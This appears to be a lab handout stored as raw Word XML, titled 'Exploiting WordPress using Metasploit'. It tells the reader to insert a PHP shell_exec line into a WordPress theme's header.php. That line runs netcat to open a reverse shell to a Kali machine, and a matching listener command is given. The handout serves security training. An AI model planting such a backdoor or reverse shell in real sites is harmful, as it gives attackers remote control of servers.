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E3EB" w14:textId="4EC9E381" w:rsidR="00FF1EC4" w:rsidRPr="00FF1EC4" w:rsidRDefault="00FF1EC4" w:rsidP="00FF1EC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF1EC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lab -</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1EC4">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1EC4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Exploiting WordPress using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC19B2A" w14:textId="686AAB58" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1EC4" w:rsidP="00FF1E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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A9093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the WordPress dashboard, use the menu on the left of the screen to click on Appearance and then editor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3903B0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54659DF" wp14:editId="16F28147">
            <wp:extent cx="2105025" cy="3128211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91" cy="3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37D4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the next page over to the right under templates, </w:t>
      </w:r>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>header.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D7F08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0563C49" wp14:editId="37539EE7">
            <wp:extent cx="1695450" cy="18478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2687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You will see the PHP code for that page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895F3F8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E03CA6E" wp14:editId="12798E85">
            <wp:extent cx="5906324" cy="1838582"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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C4A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top </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>od</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the page, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dd the following using Kali’s IP and listener port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4358D964" w14:textId="77777777" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1EC4" w:rsidP="00FF1EC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo shell_exec(“nc.exe 192.168.56.134</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e cmd.exe”); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4298A83F" w14:textId="77777777" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1EC4" w:rsidP="00FF1EC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757B4755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Scroll to the bottom of the page and press the update button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156C8EE7" w14:textId="77777777" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1EC4" w:rsidP="00FF1EC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 wp14:anchorId="5C5D2C67" wp14:editId="7D7D4C12">
            <wp:extent cx="3933825" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="9525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F3B0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Back at your Kali machine, open a terminal and setup a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the following command</w:t>
      </w:r>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3B4A27" w14:textId="77777777" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1EC4" w:rsidP="00FF1EC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00290D39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat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290D39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nlvp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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3998A23F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Press enter.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F951571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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC5AE1" wp14:editId="02974BD3">
            <wp:extent cx="3543795" cy="135273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FA1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Return to your WordPress dashboard and refresh the page using your F5 button. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B55337" w14:textId="77777777" w:rsidR="00FF1EC4" w:rsidRPr="00290D39" w:rsidRDefault="00FF1EC4" w:rsidP="00FF1EC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C89B12" w14:textId="77777777" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1EC4"/>
    <w:sectPr w:rsidR="00FF1EC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0C15" w14:textId="77777777" w:rsidR="000650DA" w:rsidRDefault="000650DA" w:rsidP="00FF1EC4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="67F68129" w14:textId="77777777" w:rsidR="000650DA" w:rsidRDefault="000650DA" w:rsidP="00F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6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4C6BD" w14:textId="065C7EA6" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1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313C6" w14:textId="77777777" w:rsidR="00FF1EC4" w:rsidRDefault="00FF1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88B2" w14:textId="77777777" w:rsidR="000650DA" w:rsidRDefault="000650DA" w:rsidP="00FF1EC4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="08AB2AB6" w14:textId="77777777" w:rsidR="000650DA" w:rsidRDefault="000650DA" w:rsidP="00FF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4"/>
    <w:rsid w:val="000650DA"/>
    <w:rsid w:val="00A66F1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6D6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{888E263B-BCAB-4427-A46F-362A602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968D700-C9C3-44D1-A030-B4E5A11A0CDB}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E3902938-80AB-45FB-ABDC-DF78D606F766}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{724A656D-39B0-4DC7-8223-87E885770B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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-15T00:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-15T00:51:00Z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